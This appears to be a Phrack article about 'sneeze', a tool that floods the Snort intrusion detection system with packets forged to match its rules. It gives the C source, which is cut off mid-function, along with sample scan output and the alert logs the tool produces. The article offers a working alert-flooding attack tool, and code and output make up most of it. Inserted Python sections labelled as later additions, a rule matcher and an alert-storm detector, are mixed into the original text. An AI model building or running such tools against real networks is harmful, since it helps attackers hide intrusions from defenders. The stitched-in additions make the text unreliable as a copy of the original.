                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x0d of 0x0f

|=----------------=[ Sneeze: Wreaking Havoc Upon Snort ]=---------------=|
|=----------------------------------------------------------------------=|
|=--------------=[ daemon10 <anonymous@phrack.efnet.ru> ]=--------------=|




1. Introduction

2. Snort Rules
	2.a	Example snort Rule
	2.b	Rule Syntax and Analysis

3. The Code
	3.a	Programming considerations
	3.b	The Holy Grail Itself

4. Outro
	4.a	Self-Promotion
   Bibliography




--[ 1. Introduction to Sneeze

  "I was gonna rip his heart out. I'm the best ever. I'm the most brutal
  and vicious, the most ruthless champion there has ever been. No one can
  stop me. Lennox is a conqueror? No! He's no Alexander! I'm Alexander!
  I'm the best ever. I'm Sonny Liston. I'm Jack Dempsey. There's never
  been anyone like me. I'm from their cloth. There is no one who can
  match me. My style is impetuous, my defense is impregnable, and I'm
  just ferocious. I want his heart! I want to eat his children! Praise be
  to Allah!" 
  - Mike Tyson
 
 
OK, now that I've come up with a wonderfully clever name for my program,
and some great quotes by my favorite heavyweight boxer, it's time to get
down to the code. What is snort? What is sneeze?

  snort (n.)
  A rough, noisy sound made by breathing forcefully through the nostrils,
  as a horse or pig does.

  sneeze (intr. v.)
  To expel air forcibly from the mouth and nose in an explosive, spasmodic
  involuntary action resulting chiefly from irritation of the nasal mucous
  membrane.

From [1],

  "Snort is an open source network intrusion detection system, capable of
  performing real-time traffic analysis and packet logging on IP networks.
  It can perform protocol analysis, content searching/matching and can be
  used to detect a variety of attacks and probes, such as buffer overflows,
  stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts,
  and much more. 
  Snort uses a flexible rules language to describe traffic that it should
  collect or pass, as well as a detection engine that utilizes a modular
  plugin architecture. Snort has a real-time alerting capability as well,
  incorporating alerting mechanisms for syslog, a user specified file, a
  UNIX socket, or WinPopup messages to Windows clients using Samba's
  smbclient. 
  Snort has three primary uses. It can be used as a straight packet sniffer
  like tcpdump(1), a packet logger (useful for network traffic debugging,
  etc), or as a full blown network intrusion detection system. "

So what is sneeze? As you can guess, it is the exact inversion and
opposite of the popular network IDS tool, snort. Snort wants packets.
Sneeze's job is to send millions and millions of them. Since snort is a
piece of shit with tons of exploitable and DOS'able overflows (which
unfortunately we aren't going to publish simply because they can be fixed
too easily), one might expect that it would also suck at coping with
false positives and floods and the like. Which it does! Snort purports to
be an excellent way for people who aren't sure how to disable default
services and generally secure their server to detect intrusion attempts.
It is also an official tool of our favorite friends over at Project
Honeynet [2].

In the direct words of the devil himself,

  "Snort-Inline: Currently the Honeynet Project's control capabilities are
  based on IPTables and Snort-Inline. We are looking for people to port
  snort-inline to other firewalls and operating systems, including pf on
  OpenBSD."




--[ 2. Snort Rules

  "I can sell out Madison Square Garden masturbating." 
  - Mike Tyson


Snort is a piece of shit, and a pretty basic piece of shit at that. I'm
not sure exactly who Marty Roesch is, but judging by the sheer volume of
off-by-ones, integer overflows, and logic bugs I found in his code, he
was probably subject at one point to an intense training session by the
Shmoo Group.

  2.a	Example snort Rule

To generate the sneeze output, we will be using the Snort rule files.
Let's take a look at an example rule file, taken from the snort.org
website [3]:

  SID  209  message  BACKDOOR w00w00 attempt 

  Signature  alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23
  (msg:"BACKDOOR w00w00 attempt"; flow:to_server,established;
  content:"w00w00"; reference:arachnids,510; classtype:attempted-admin;
  sid:209; rev:4;)  

  Summary  w00w00 is a Trojan Horse utilizing Telnet. This event is
  generated when an attacker attempts to connect to a w00w00 server using
  Telnet.

  Impact  Possible theft of data and control of the targeted machine
  leading to a compromise of all resources the machine is connected to.
  This Trojan also has the ability to delete data, steal passwords and
  disable the machine.

As one can see, this is an extremely serious and threatening
vulnerability, which lurks to destroy even the most paranoid of admins.
Most snort rules come attached to a plethora of useless verbose
information that we can just ignore. This makes it simple for a network
administrator to see in his log directory the exact time and reason why
he was owned, instead of simply giving a CERT# or exploit name that he
would have to manually reference using a web search engine.

In any case, the rule doesn't say much. The basic breakdown is that the
data must occur over an open (established) TCP session, and the traffic
must be sent to one of the telnet servers. TELNET_SERVERS is a snort
variable defined in snort.conf, and is typically set to $HOME_NET. For an
unconfigured snort setup, HOME_NET will match "any" IP, but it can also be
set to a subnet range such as 10.0.0.* or 192.168.0.* or whatever you want
it to be. The data must be flowing "to_server." I'm sure you can figure
this out... the data packet must also contain the string "w00w00." This
rule is so simple we could just telnet to the server and type "w00w00"
and trigger the snort rule if it's set.

Notice how dumb this is: jobe can't even read his mail without
1. Setting off a snort alarm by typing in his password "w00w00"
2. Getting sniffed and owned because he's logging into df.ru via telnet

There's not much to this. Let's look at one last example before we get
into the code.

This example is more complex: RPC mountd UDP export request

  alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC mountd UDP
  export request"; content:"|00 00 00 00|"; offset:4; depth:4;
  content:"|00 01 86 A5|"; offset:12; depth:4; content:"|00 00 00 05|";
  distance:4; within:4; reference:arachnids,26; classtype:attempted-recon;
  sid:1924; rev:4;) 

We have multiple fields to keep our eye on. Here parts of the packet
contents are delimited by '|', so we know the result will be packed as a
hex string. Hex strings can be 1, 2, or 4 bytes, depending on whether
there are 2, 4, or 8 adjacent hex digits. For example, 03 is one hex
byte, 0003 is a short hex word, etc.

The offset field denotes the offset from the start of the payload at
which the specified (byte) string will be found. After an initial match,
the "within" keyword specifies the maximum number of bytes from the end
of the last match within which the current match must be found.

  2.b	Rule Syntax and Analysis

Here is a list of snort keywords with which we will be concerned:

Keyword     Description
-------     -----------
dsize       Specifies a required payload data size.
            Can be used with the < and > operators to specify ranges.
content     Matches a content string.
            Can be combined with the ! operator for inversion.
offset      Specifies a content offset from the start of the payload.
depth       Specifies the maximum number of bytes to search through in
            order to make a content-based match.
nocase      Turns off case-sensitive matching.
flow        Direction of the traffic.
            Can be to_server, from_server, etc.
distance    Specifies the minimum byte distance between content matches.

There are things we won't be concerned with. These include:

  preprocessors such as HTTP decode
  keyword directives such as icmp_id

Notice that the snort guide has reams of wonderful, efficient rules to
secure your personal network from pesky intruders:

alert tcp any any -> 192.168.1.0/24 80 (content: "cgi-bin/phf"; \
    offset: 3; depth: 22; msg: "CGI-PHF access";)

Of course, nobody would ever consider sending something like
"GET                     /cgi-bin/blah..." to an HTTP server, so your
depth match will be sure to catch ALL intrusion attempts.
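The content modifiers discussed in this section (offset/depth measured from the start of the payload, distance/within measured from the end of the previous match, nocase, and the |hex| syntax) are easier to reason about with a small reference matcher. The Python below is an added example for this edition, not code from the article or from sneeze. It assumes Snort 2.x semantics, in which depth and within both bound the window into which the whole pattern must fit. The two rules are quoted from the article; the RPC payloads and all function names are constructed here.

```python
import re
from dataclasses import dataclass

# one rule option: keyword, optional ":value" (quoted or bare), closing ';'
OPTION_RE = re.compile(r'\s*(\w+)\s*(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?\s*;')


@dataclass
class Content:
    pattern: bytes
    offset: int = 0     # absolute: where the search window starts
    depth: int = 0      # absolute: window length from offset (0 = to end)
    distance: int = 0   # relative: bytes to skip after the previous match
    within: int = 0     # relative: window length after the skip (0 = to end)
    nocase: bool = False


def parse_content(text):
    """Decode a content string: literals, backslash escapes, |hex| runs."""
    out, i, in_hex = bytearray(), 0, False
    while i < len(text):
        c = text[i]
        if c == '|':
            in_hex, i = not in_hex, i + 1
        elif in_hex and c.isspace():
            i += 1
        elif in_hex:
            out.append(int(text[i:i + 2], 16))   # every hex pair is one byte
            i += 2
        elif c == '\\' and i + 1 < len(text):
            out.append(ord(text[i + 1]))         # \| \" \; \: become literals
            i += 2
        else:
            out.append(ord(c))
            i += 1
    if in_hex:
        raise ValueError("unterminated |hex| run in content")
    return bytes(out)


def parse_rule(rule):
    """Return (msg, ordered Content list) from one rule line."""
    body = rule.partition('(')[2].strip().rstrip(')')
    msg, contents, pos = "", [], 0
    while body[pos:].strip():
        m = OPTION_RE.match(body, pos)
        if m is None:
            raise ValueError("cannot parse options near: " + body[pos:pos + 20])
        pos = m.end()
        key, val = m.group(1).lower(), (m.group(2) or "").strip()
        if val[:1] == '"':
            val = val[1:-1]
        if key == "msg":
            msg = val
        elif key == "content":
            contents.append(Content(parse_content(val)))
        elif key in ("offset", "depth", "distance", "within"):
            setattr(contents[-1], key, int(val))   # modifies the last content
        elif key == "nocase":
            contents[-1].nocase = True
        # flow, reference, classtype, sid, rev do not affect payload matching
    return msg, contents


def match_contents(contents, payload):
    """Apply contents in order; distance/within anchor on the previous match end."""
    prev_end = 0
    for c in contents:
        if c.distance or c.within:
            start = prev_end + c.distance
            end = start + c.within if c.within else len(payload)
        else:
            start = c.offset
            end = start + c.depth if c.depth else len(payload)
        hay, needle = payload[start:end], c.pattern
        if c.nocase:
            hay, needle = hay.lower(), needle.lower()
        idx = hay.find(needle)   # slicing forces the whole pattern inside the window
        if idx < 0:
            return False
        prev_end = start + idx + len(needle)
    return True


def rule_matches(rule, payload):
    return match_contents(parse_rule(rule)[1], payload)


# rules quoted from the article; the RPC payloads are constructed for this example
MOUNTD_RULE = ('alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC mountd UDP '
               'export request"; content:"|00 00 00 00|"; offset:4; depth:4; '
               'content:"|00 01 86 A5|"; offset:12; depth:4; content:"|00 00 00 05|"; '
               'distance:4; within:4; reference:arachnids,26; '
               'classtype:attempted-recon; sid:1924; rev:4;)')
W00W00_RULE = ('alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23 (msg:"BACKDOOR '
               'w00w00 attempt"; flow:to_server,established; content:"w00w00"; '
               'reference:arachnids,510; classtype:attempted-admin; sid:209; rev:4;)')
# ONC RPC call: xid, CALL, rpcvers 2, prog 100005 (mountd), vers 1, proc, then creds
RPC_MOUNTD_EXPORT = bytes.fromhex("deadbeef 00000000 00000002 000186a5 00000001 00000005") + bytes(16)
RPC_MOUNTD_NULL = bytes.fromhex("deadbeef 00000000 00000002 000186a5 00000001 00000000") + bytes(16)

if __name__ == "__main__":
    print("mountd EXPORT call:", rule_matches(MOUNTD_RULE, RPC_MOUNTD_EXPORT))  # True
    print("mountd NULL call:  ", rule_matches(MOUNTD_RULE, RPC_MOUNTD_NULL))    # False
```

The three chained contents of the mountd rule pin down the RPC call type, program number and procedure number at fixed positions, so a constructed EXPORT call matches and a NULL-procedure call to the same program does not. Because within bounds the whole pattern, a 4-byte content with distance:4 and within:4 has exactly one admissible position, 4 bytes after the previous match ends.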

Since the snort rules give vague notions of how data should be arranged
in a malicious packet (apart from the fixed fields specified by the
"content" directive), we can easily create a polymorphic engine which
can repeatedly send all sorts of fake snort triggers, with randomized
data content and data lengths. And that's exactly what we did.




--[ 3. The Code

  "This country was built on rape, slavery, murder, degradation and
  affiliation with crime." 

  - Mike Tyson


  3.a. Programming Considerations

The following program could have been made more complete and thorough by
employing packet construction techniques that matched all possible snort
rule directives. The code below only handles rules that describe plain
vanilla TCP connections or UDP packets. And believe me, there are plenty
of such attacks to go around for everybody. Some rules require special
IP or TCP options to be set, or IP fragmentation, etc. Even though I am
the renowned author of the famous libnet library, and the world's
foremost authority on IP spoofing, TCP hijacking, and packet construction,
I was not able to include these features in sneeze 1.0 because of the
time such features would require. I have a fast car, a girlfriend, and
a complex web of social acquaintances, so... dear reader, as you may have
guessed, I have better things to do than develop free software that meets
all your demands and specifications.

Besides, using standard sockets to do all the work is good because it
allows the program to be run by any user.

Here's some sample output. First the scan:


Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on juggernaut (192.168.0.6):
(The 1593 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
25/tcp     open        smtp
37/tcp     open        time
79/tcp     open        finger
111/tcp    open        sunrpc
113/tcp    open        auth
587/tcp    open        submission

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
infonexus#


Now, running sneeze with debugging output...

infonexus# ./sneeze juggernaut 21,22,25,37,79,111,113,587 /usr/pkg/share/snort/*.rules
[..... snip .....]
launching attack ...
ATTACK [SMTP expn *@]
     srcport - 0, dstport - 25, proto - tcp, dsize - 0
     offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 7, [expn *@]
ATTACK LEN = 7   :   [eXpN *@]
ATTACK [SMTP sendmail 5.5.5 exploit]
     srcport - 0, dstport - 25, proto - tcp, dsize - 0
     offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 13, [mail from: "|]
ATTACK LEN = 13   :   [mAiL fRoM: "|]
ATTACK [RPC portmap request ypserv]
     srcport - 0, dstport - 111, proto - udp, dsize - 0
     offset = 40, distance = 0, within = 0, case-sensitive = 0, len = 5, [\x01\x86\xa4\x00\x00]
ATTACK LEN = 45   :   [4Yd29qVs0eHcxQBSEfTCJ1m3iRL8vwMPINoZhguW\x01\x00\x00]
^C
infonexus#

Here's the log we see in the other window with our trusty tail -f monitor:
[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959696 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59
***AP*** Seq: 0x10DAD08F  Ack: 0x80636DD1  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423435 65878141
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200]

[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959803 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59
***AP*** Seq: 0x10DAD08F  Ack: 0x80636DD1  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423435 65878141
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200]

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965590 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65
***AP*** Seq: 0x15071B8E  Ack: 0x805FB299  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423439 65878342
[Xref => http://www.whitehats.com/info/IDS119]

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965701 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65
***AP*** Seq: 0x15071B8E  Ack: 0x805FB299  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423439 65878342
[Xref => http://www.whitehats.com/info/IDS119]

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975717 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73
Len: 53
[Xref => http://www.whitehats.com/info/IDS12]

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975818 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73
Len: 53
[Xref => http://www.whitehats.com/info/IDS12]
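Seen from the sensor side, the log above is the footprint a signature flooder leaves: one source tripping unrelated signatures (two SMTP rules, then an RPC rule) within a few seconds. The Python below is an added example, not part of the article; it parses Snort's full-alert format as shown above and flags any source that trips several distinct signature IDs inside a short window, so a console can correlate the storm as one event instead of paging on every alert. The alert excerpt is constructed in the article's format (it reuses entries from the log above and adds one benign source); the window length and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

ALERT_HDR_RE = re.compile(r'^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$')
# second line of each alert: timestamp (no year), src[:port] -> dst[:port]
FLOW_RE = re.compile(r'^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) '
                     r'(\d+\.\d+\.\d+\.\d+)(?::\d+)? -> (\d+\.\d+\.\d+\.\d+)(?::(\d+))?$')

# constructed excerpt in the format shown above: the article's three signatures
# from 192.168.0.1, plus one unrelated alert from a second source
SAMPLE_ALERTS = """\
[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959696 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59

[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959803 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965590 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975717 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73

[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:25:01.000000 10.0.0.7:40001 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:100 IpLen:20 DgmLen:59
"""


def parse_timestamp(stamp):
    """Seconds since Jan 1 of a fixed leap year (the log carries no year)."""
    dt = datetime.strptime("2000/" + stamp, "%Y/%m/%d-%H:%M:%S.%f")
    return (dt - datetime(2000, 1, 1)).total_seconds()


def parse_alerts(text):
    """Pair each [**] header with the flow line that follows it."""
    events, cur = [], None
    for line in text.splitlines():
        m = ALERT_HDR_RE.match(line)
        if m:
            cur = dict(gid=int(m[1]), sid=int(m[2]), rev=int(m[3]), msg=m[4])
            continue
        m = FLOW_RE.match(line)
        if m and cur is not None:
            cur.update(ts=parse_timestamp(m[1]), src=m[2], dst=m[3],
                       dport=int(m[4]) if m[4] else None)
            events.append(cur)
            cur = None
    return events


def find_alert_storms(events, window_s=30.0, min_distinct=3):
    """Per source: the sorted SIDs of the first window_s-second span that
    holds at least min_distinct distinct signatures (repeats collapse)."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    storms = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            sids = {e["sid"] for e in evs[i:] if e["ts"] - first["ts"] <= window_s}
            if len(sids) >= min_distinct:
                storms[src] = sorted(sids)
                break
    return storms


if __name__ == "__main__":
    for src, sids in find_alert_storms(parse_alerts(SAMPLE_ALERTS)).items():
        print(f"{src}: {len(sids)} distinct signatures in one window: {sids}")
```

On the excerpt, 192.168.0.1 is reported with SIDs 590, 662 and 1450 inside one window, while 10.0.0.7, which trips a single rule, is not. Counting distinct SIDs rather than raw alerts is what makes the duplicated entries in the log above harmless to the threshold.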


  3.b. The Holy Grail Itself

Grab yourself some snort rule files to feed into this, and then
start cutting .......


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>	/* strcasecmp() */
#include <ctype.h>
#include <netdb.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <stdarg.h>

#define XDEBUG		1

/* we can't hope to generate these sorts of packets, so just
   skip them automatically */

char *ignored_keywords[] =
{
	"id",
	"ipoption",
	"fragbits",
	"seq",
	"ack",
	"itype",
	"icode",
	"session",
	"icmp_id",
	"icmp_seq",
	"content-list",
	"uricontent",
	"ip_proto",
	"fragoffset",
	"tos",
	"ttl",
	"byte_test",
	"byte_jump"
};

/* FUCK SNORT */


#define DELAY_TIME		2		/* # seconds between attacks */

#define XMAX(x,y)		(x > y ? x : y)


struct snort_data
{
	unsigned int attack_len;
	unsigned char *attack_data;
	unsigned char case_insensitive;
	unsigned int offset;
	unsigned int distance;
	unsigned int within;
	struct snort_data *next;
};


/* everything should run in user mode... so not ALL attacks will be used */

struct snort_rule {
	char *description;
	unsigned short srcport;
	unsigned short dstport;
	unsigned char protocol;
	unsigned int dsize;
	struct snort_data *sdata;
	struct snort_rule *next;
};


struct snort_rule *ruleslist = NULL;
unsigned int num_rules = 0;


struct snort_rule *select_random_rule (int *availports);
int *read_port_list (char *ports);
void add_rule (char *buf);
int parse_line_data (struct snort_rule *rule, char *line);
void debug_printf (char *fmt, ...);
unsigned short getsrcport (char *portstr, char *proto);
void *parse_content_string (char *line, unsigned int *sizeptr);
void dump_snort_data (struct snort_data *data);
void mix_case (char *ptr, unsigned int len);
void *create_data_packet (struct snort_rule *rule, unsigned int *sizeptr);
void fill_random_data (char *buf, unsigned int len);
int random_number (int lo, int hi);
void *xrealloc (void *ptr, size_t size);



void
usage (char *program)
{
	fprintf (stderr, "Usage: %s <host> <portlist> [rulefile1 rulefile2 ...]\n", program);
	exit (EXIT_FAILURE);
}


int
main (int argc, char *argv[])
{
	FILE *f;
	struct snort_rule *cur;
	struct sockaddr_in s_in, bs_in;
	struct hostent *he;
	char *hostname;
	char *portlist;
	unsigned int i;
	int *ports, fd;

	srand (time (NULL));

	if (argc < 4)
		usage (argv[0]);

	hostname = argv[1];
	portlist = argv[2];

	if ((ports = read_port_list (portlist)) == NULL)
	{
		fprintf (stderr, "Error reading portlist!\n");
		exit (EXIT_FAILURE);
	}

	if ((he = gethostbyname (hostname)) == NULL)
	{
		herror ("gethostbyname");
		exit (EXIT_FAILURE);
	}

	memset (&s_in, 0, sizeof (s_in));
	s_in.sin_family = AF_INET;
	memcpy (&s_in.sin_addr.s_addr, he->h_addr, 4);

	for (i = 3; i < argc; i++)
	{
		char rulebuf[1024];

		f = fopen (argv[i], "r");

		if (f == NULL)
		{
			perror (argv[i]);
			exit (EXIT_FAILURE);
		}

		memset (rulebuf, 0, sizeof (rulebuf));

		while (fgets (rulebuf, sizeof (rulebuf) - 1, f) != NULL)
		{
			add_rule (rulebuf);
			memset (rulebuf, 0, sizeof (rulebuf));
		}

		fclose (f);
	}

	if (ruleslist == NULL || num_rules == 0)
	{
		fprintf (stderr, "No usable rules were loaded!\n");
		exit (EXIT_FAILURE);
	}

	/* wreak havoc */

	printf ("launching attack ...\n");

	while (1)
	{
		char *attack_data = NULL;
		unsigned int attack_len;

		cur = select_random_rule (ports);

		if (cur == NULL)
		{
			fprintf (stderr, "No loaded rule targets any of the given ports!\n");
			exit (EXIT_FAILURE);
		}

		debug_printf ("ATTACK [%s]\n     srcport - %u, dstport - %u, "
			      "proto - %s, dsize - %d\n",
			      cur->description, cur->srcport, cur->dstport,
			      (cur->protocol == IPPROTO_TCP ? "tcp" : "udp"),
			      cur->dsize);
		dump_snort_data (cur->sdata);

		s_in.sin_port = htons (cur->dstport);

		/* dstport 0 means "any": aim at the first open port given on
		   the command line (ports is the parsed list, not the string) */
		if (!s_in.sin_port)
			s_in.sin_port = htons (ports[0]);

		if (cur->protocol == IPPROTO_TCP)
			fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
		else
			fd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);

		if (fd < 0)
		{
			perror ("socket");
			exit (EXIT_FAILURE);
		}

		/* in case we need to bind to a particular port */

		if (cur->srcport)
		{
			int on = 1;

			memset (&bs_in, 0, sizeof (bs_in));
			bs_in.sin_family = AF_INET;
			bs_in.sin_addr.s_addr = INADDR_ANY;
			bs_in.sin_port = htons (cur->srcport);

			setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on));

			if (bind (fd, (struct sockaddr *) &bs_in, sizeof (bs_in)) < 0)
			{
				perror ("bind");
				close (fd);
				continue;
			}

		}

		attack_data = create_data_packet (cur, &attack_len);

		/* check before touching the buffer in the debug dump below */
		if (attack_data == NULL)
		{
			fprintf (stderr, "Unexpected error occurred!\n");
			exit (EXIT_FAILURE);
		}

		{
			unsigned int z;

			debug_printf ("ATTACK LEN = %d   :   [", attack_len);

			for (z = 0; z < attack_len; z++)
			{
				if (isprint ((unsigned char) attack_data[z]))
					debug_printf ("%c", attack_data[z]);
				else
					debug_printf ("\\x%.2x", (unsigned char) attack_data[z]);
			}

			debug_printf ("]\n");
		}

		if (cur->protocol == IPPROTO_TCP)
		{

			if (connect (fd, (struct sockaddr *) &s_in, sizeof (s_in)) < 0)
			{
				perror ("connect");
				close (fd);
				continue;
			}

			send (fd, attack_data, attack_len, 0);
		}
		else
			sendto (fd, attack_data, attack_len, 0,
				(struct sockaddr *) &s_in, sizeof (s_in));

		close (fd);
		free (attack_data);
		printf ("\n.");

		sleep (DELAY_TIME);
	}

	return 0;
}


#define ABORT_RULE		{ free (rule); return; }

void
add_rule (char *buf)
{
	struct snort_rule *rule;
	char word1[64], word2[64], word3[64], word4[64], word5[64],
	     word6[64], word7[64];
	char *ptr = buf;

	if (buf[0] == '#' || buf[0] == 0)
		return;

	/* strip the newline left by fgets(); the copies passed in by the
	   port-range replication below have no newline to strip */
	if (buf[strlen (buf) - 1] == '\n')
		buf[strlen (buf) - 1] = 0;

	if ((rule = malloc (sizeof (struct snort_rule))) == NULL)
	{
		perror ("malloc");
		exit (EXIT_FAILURE);
	}

	memset (rule, 0, sizeof (struct snort_rule));
	rule->next = NULL;

	if (sscanf (buf, "%s %s %s %s %s %s %s",
		    word1, word2, word3, word4, word5, word6, word7) != 7)
		ABORT_RULE

	if (strcasecmp (word1, "alert"))
		ABORT_RULE

	if (!strcasecmp (word2, "tcp"))
		rule->protocol = IPPROTO_TCP;
	else if (!strcasecmp (word2, "udp"))
		rule->protocol = IPPROTO_UDP;
	else
		ABORT_RULE

	if ((strcmp (word3, "$EXTERNAL_NET")) && (strcmp (word3, "any")) &&
	    (strcmp (word3, "$HOME_NET")) && (strcmp (word3, "$HTTP_SERVERS"))&&
	    (strcmp (word3, "$SMTP_SERVERS")) && (strcmp (word3, "$SQL_SERVERS")) &&
	    (strcmp (word3, "$TELNET_SERVERS")))
		ABORT_RULE

	/* handle a source port range (lo:hi) by replicating the rule with
	   just "hi" and letting this copy fall through with "lo" */

	if (strchr (word4, ':'))
	{
		char *dupbuf, *dptr, *dptr2;

		if ((dupbuf = strdup (buf)) == NULL)
			ABORT_RULE

		if ((dptr = strstr (dupbuf, word4)) == NULL)
		{
			free (dupbuf);
			ABORT_RULE
		}

		if ((dptr2 = strchr (dptr, ':')) == NULL)
		{
			free (dupbuf);
			ABORT_RULE
		}

		/* drop "lo:"; source and destination overlap, so memmove */
		dptr2++;
		memmove (dptr, dptr2, strlen (dptr2) + 1);
		add_rule (dupbuf);
		free (dupbuf);
	}

	if (!strcmp (word4, "any"))
		rule->srcport = 0;
	else
	{
		rule->srcport = getsrcport (word4, word2);

		if (!rule->srcport)
			ABORT_RULE

	}

	/* must go to the server or be bi-directional flow */
	if ((strcmp (word5, "->")) && strcmp (word5, "<>"))
		ABORT_RULE

	/* handle a destination port range the same way */

	if (strchr (word7, ':'))
	{
		char *dupbuf, *dptr, *dptr2;

		if ((dupbuf = strdup (buf)) == NULL)
			ABORT_RULE

		if ((dptr = strstr (dupbuf, word7)) == NULL)
		{
			free (dupbuf);
			ABORT_RULE
		}

		if ((dptr2 = strchr (dptr, ':')) == NULL)
		{
			free (dupbuf);
			ABORT_RULE
		}

		dptr2++;
		memmove (dptr, dptr2, strlen (dptr2) + 1);
		add_rule (dupbuf);
		free (dupbuf);
	}

	if (!strcmp (word7, "$HTTP_PORTS"))
		rule->dstport = 80;
	else if (!strcmp (word7, "$ORACLE_PORTS"))
		rule->dstport = 1521;
	else if (!strcmp (word7, "$SHELLCODE_PORTS"))
		rule->dstport = 0;
	else if (!strcmp (word7, "any"))
		rule->dstport = 0;
	else
	{
		rule->dstport = getsrcport (word7, word2);

		if (!rule->dstport)
			ABORT_RULE

	}

	ptr = buf;
	rule->sdata = NULL;

	ptr = strchr (buf, '(');

	if (ptr == NULL)
		ABORT_RULE

	if (!parse_line_data (rule, ptr))
	{
		/* success, prepend the rule to the list */

		if (ruleslist == NULL)
			ruleslist = rule;
		else
		{
			rule->next = ruleslist;
			ruleslist = rule;
		}

		num_rules++;

		debug_printf ("ADDED RULE - [%s], srcport = %d, dstport = %d, proto = %d\n",
			      rule->description, rule->srcport, rule->dstport, rule->protocol);
		dump_snort_data (rule->sdata);

	}

	return;
}



#define REJECT_RULE		{ rejected = 1; goto done_parsing; }
/* parse the main data into the full snort rule */
/* return 1 if the operation fails, 0 otherwise */

int
parse_line_data (struct snort_rule *rule, char *line)
{
	struct snort_data *sdata = NULL, *last_data = NULL;
	char *ptr, *end_keyword, *begin_data, *end_data;
	unsigned int i;
	unsigned int rejected = 0;

	ptr = line;
	*ptr++ = 0;

	while (1)
	{

		while (isspace (*ptr))
			ptr++;

		if (!*ptr)
			REJECT_RULE
		else if (*ptr == ')')
			goto done_parsing;

		end_keyword = ptr;

		/* remember keywords such as nocase take no parameters */
		while (*end_keyword && (*end_keyword != ':') &&
		      (*end_keyword != ';'))
			end_keyword++;

		if (!*end_keyword)
			REJECT_RULE

		*end_keyword++ = 0;

		if (!strlen (ptr))
			REJECT_RULE

		/* check to see if we can handle this keyword */

		for (i = 0; i < (sizeof (ignored_keywords) / sizeof (char *)); i++)
		{

			if (!strcasecmp (ptr, ignored_keywords[i]))
				REJECT_RULE

		}

		/* special case */
		if (!strcasecmp (ptr, "nocase"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->case_insensitive = 1;
			ptr = end_keyword;
			continue;
                }


		begin_data = end_keyword;

